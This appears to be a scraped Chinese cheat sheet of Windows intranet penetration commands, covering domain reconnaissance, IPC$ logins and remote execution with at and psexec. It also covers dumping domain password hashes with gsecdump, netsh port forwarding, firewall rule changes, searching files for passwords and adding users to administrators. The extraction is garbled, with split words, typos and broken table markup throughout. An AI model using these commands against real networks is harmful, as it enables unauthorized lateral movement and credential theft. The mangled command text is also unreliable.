内网渗透命令大全
1.域常用操作命令:
1.域常用操作命令: | |
net group /domain | //获得所有域用户组列表 |
net group qq_group /domain | //显示域中 qq_group 组的成员 |
net group qq_group /del /domain | //删除域中 qq_group 组 |
net group qq_group qq /del /domain | //删除域内 qq_group 群组中的成员 QQ |
net group qq_group /add /domain | //增加域中的群组 |
net group "domain admins" /domain | //获得域管理员列表 |
net group "enterprise admins" /domain | //获得企业管理员列表 |
net localgroup administrators /domain | //获取域内置 administrators 组用(enterprise admins、 domain admins) |
net group "domain controllers" /domain | //获得域控制器列表 |
net group "domain computers" /domain | //获得所有域成员计算机列表 |
net user /domain | //获得所有域用户列表 |
net user someuser /domain | //获得指定账户 someuser 的详细信息 |
net accounts /domain | //获得域密码策略设置,密码长短,错误锁定等信息 |
nei view /domain | //查询有几个域, 查询域列表 |
net view /domain:testdomain | //查看 testdomain 域中的计算机列表 |
nltest /domain_trusts | //获取域信任信息 |
net user domain-admin /domain | //查看管理员登陆时间,密码过期时间,是否有登陆脚本, 组分配等信息 |
net config Workstation | //查询机器属于哪个域 |
net time /domian | //查询主域服务器的时间 |
echo %logonserver% | //查看登陆到这台服务器的计算机名 |
net time \\192.168.1.1 | //查询远程共享主机 192.168.1.1 的时间 |
net use \\IP\ipc$ password /user:userna me@domain |
//ipc$域内连接 |
net view \\dc2.backlion.com | //查看域控共享情况 |
dir \\dc2.backlion.com\SYSVOL /s / a > sysvol.txt |
//列出 sysvol 日志记录 |
xcopy \\dc2.backlion.com\sysvol.txt sysvo l.txt /i /e /c |
//远程拷贝到本地 sysvol 日志 |
net user /domain bk bk123 | //修改域内用户密码,需要管理员权限 |
net localgroup administartors SE ZKL\backlion /add | //将 SEZKL 域中的用户 backlion 添加到 administrators 组中 |
mstsc /admin | //远程桌面登录到 console 会话解决 hash 无法抓出问题 |
gpupdate/force | //更新域策略 |
psexec \\192.168.1.3 -u administrator - p bk1234 -c gsecdump.exe -u | //从域服务器密码存储文件 windows/ntds/ntds.dit 导出 h ash 值出来 |
gsecdump -a | //获取域登管理员登录过得 hash 值,这里 gescdump 为第 三方导出 AD 域的 hash 值 |
tasklist /S ip /U domain\username / P /V |
//查看远程计算机进程列 |
2.基本内网渗透命令: | |
ipconfig/all | //查看 IP 地址 |
ipconfig /release | //释放地址 |
ipconfig /renew | 重新获取 Ip 地址 |
whoami | //查询账号所属权限 |
whoami/all | //查看 sid 值 |
systeminfo | //查询系统以及补丁信息 |
tasklist /svc | //查看进程 |
taskkill /im 进程名称(cmd) | //结束进程 |
taskkill /pid[进程码] -t(结束该进程) -f(强制结束该进程以及所有子进程) |
wmic qfe get hotfixid | //查看已安装过得补丁,这个很实用 |
wmic qfe list full /format:htable > h otfixes.htm |
//详细的补丁安装 |
wmic qfe | //查询补丁信息以及微软提供的下载地址 |
ping hostname(主机名) | //显示该机器名的 IP |
net start | //查看当前运行的服务 |
net user | //查看本地组的用户 |
net localhroup administrators | //查看本机管理员组有哪些用户 |
net user | //查看会话 |
net session | //查看当前会话 |
net share | //查看 SMB 指向的路径[即共享] |
wmic share get name,path | //查看 SMB 指向的路径 |
wmic nteventlog get path,filename,writea ble |
//查询系统日志文件存储位置 |
net use \\IP\ipc$ password /user:us ername |
//建立 IPC 会话(工作组模式) |
net use z: \\192.168.1.1 | //建立映射到本机 Z 盘 |
net time \\172.16.16.2 | //查询共享主机的是 |
at \\172.16.16.2 13:50 c:\windows\2009.e xe |
//在共享主机上执行 |
netstat -ano | //查看开放的端口 |
netstat -an | find “3389” | //找到 3389 端口 |
net accounts | //查看本地密码策略 |
nbtstat –A ip | //netbiso 查询 |
net view | //查看机器注释或许能得到当前活动状态的机器列 禁用 netbios 就查看不出来 |
echo %PROCESSOR_ARCHITECTURE% | //查看系统是 32 还是 64 位 |
set | //查看系统环境设置变量 |
net start | //查看当前运行的服务 |
wmic service list brief | //查看进程服务 |
3.内网网络结常用命令: | |
tracert IP | //路由跟踪 |
route print | //打印路由表 |
arp -a | //列出本网段内所有活跃的 IP 地址 |
arp -s (ip + mac) | //绑定 mac 与 ip 地址 |
arp -d (ip + mac) | //解绑 mac 与 ip 地址 |
nbtscan -r 192.168.16.0/24 | //通过小工具 nbtscan 扫描整个网络 |
netsh firewall show config | //查看防火墙策略 |
netsh firewall show state | //查看防火墙策略 |
for /l %i in (1,1,255) do @ping 10.0. 0.%i -w 1 -n 1 | find /i"ttl" |
//批量扫描内网存活主机 |
windows自带端口转发: | |||||
netsh |
interface |
ipv6 install | //首先安装 IPV6(xp、2003 下 IPV6 必须安装,否则 发不可用!) | ||
netsh interface portproxy add v4tov4 l istenaddress=0.0.0.0 listenport=22connecta ddress=1.1.1.1 connectport=22 |
//将本机 22 到 1.1.1.1 的 22 | ||||
netsh interface portproxy add v4tov4 l istenaddress=192.168.193.1listenport=22 co nnectaddress=8.8.8.8 connectport=22 | |||||
netsh interface portproxy add v4tov4 l istenaddress=192.168.193.1listenport=22 co nnectaddress=www.baidu.com connectport=22 | |||||
netsh | interface | portproxy show | all | // | 查看转发配置 |
netsh interface portproxy delete v4tov 4 listenaddress=0.0.0.0listenport=22 |
//删除配置 | ||||
netsh firewall set portopening protocol =tcp port=22 name=Forwardmode=enable sco pe=all profile=all |
//添加防火墙规则,允许连接 22: |
findstr /si password *.xml *.ini *.txt | //查看后缀名文件中含有 password 关键字的文件 |
findstr /si login *.xml *.ini *.txt | //查看后缀名文件中含有 login 关键字的文件 |
copy con 创建命令: | |
copy con ftp.bat | //创建 ftp.bat 批处理,然后输入 ifconfig 等命令 r+z 退出,并创建成功 |
copy con test.vbs | //创建 test.vbs 脚本,输入脚本后,按 ctr+z 退出 建成功 |
5.dsquery的 AD 查询工具: | |
dsquery user domainroot -limit 65535 & & net user /domain |
//列出该域内所有用户名 |
dsquery server -domain super.com | dsg et server -dnsname -site | //搜索域内所有域控制器并显示他们的 DNS 主机名 名称 |
dsquery contact | //寻找目录中的联系人 |
dsquery subnet | //列出该域内网段划分 |
query user | //查询那些用户在线 |
dsquery group && net group /domain | //列出该域内分组 |
dsquery ou | //列出该域内组织单位 |
dsquery server && net time /domain | //列出该域内域控制器 |
dsquery site -o rdn | //搜索域中所有站点的名称 |
dsquery group dc=super,dc=com |more | //搜索在 DC=SUPER,DC=COM 域中的所有组 |
psloggedon.exe | //查询那台主机和用户登录到该主机上 |
netsess.exe //192.168.1.115 | //远程主机上无需管理员权限,查询到主机名和用户 |
reg query "HKEY_CURRENT_USER\SOFTWARE\MIC ROSOFT\TERMINAL SERVERCLIENT\DEFAULT" |
//获取最近 mstsc 登录的记录 |
DOS 常用快捷命令 | |
mspaint | 画图工具 |
calc | 计算器 |
notepad | 记事本 |
taskmgr | 任务管理器 |
osk | 打开屏幕键盘 |
gpedit.msc | 组策略 |
services.msc | 本地服务 |
compmgmt.msc | 计算机管理 |
devmgmt.msc | 设备管理器 |
winver | 查看系统版本 |
magnify | 放大镜实用程序 |
eventvwr | 事件查看器 |
Regedit | 打开注册表 |
resmon | 资源监视器 |
WMIC BIOS get release date |
查看电脑生产日期 |
mstsc -f | 远程连接(可以全屏) |
扫一扫关注微信公众帐号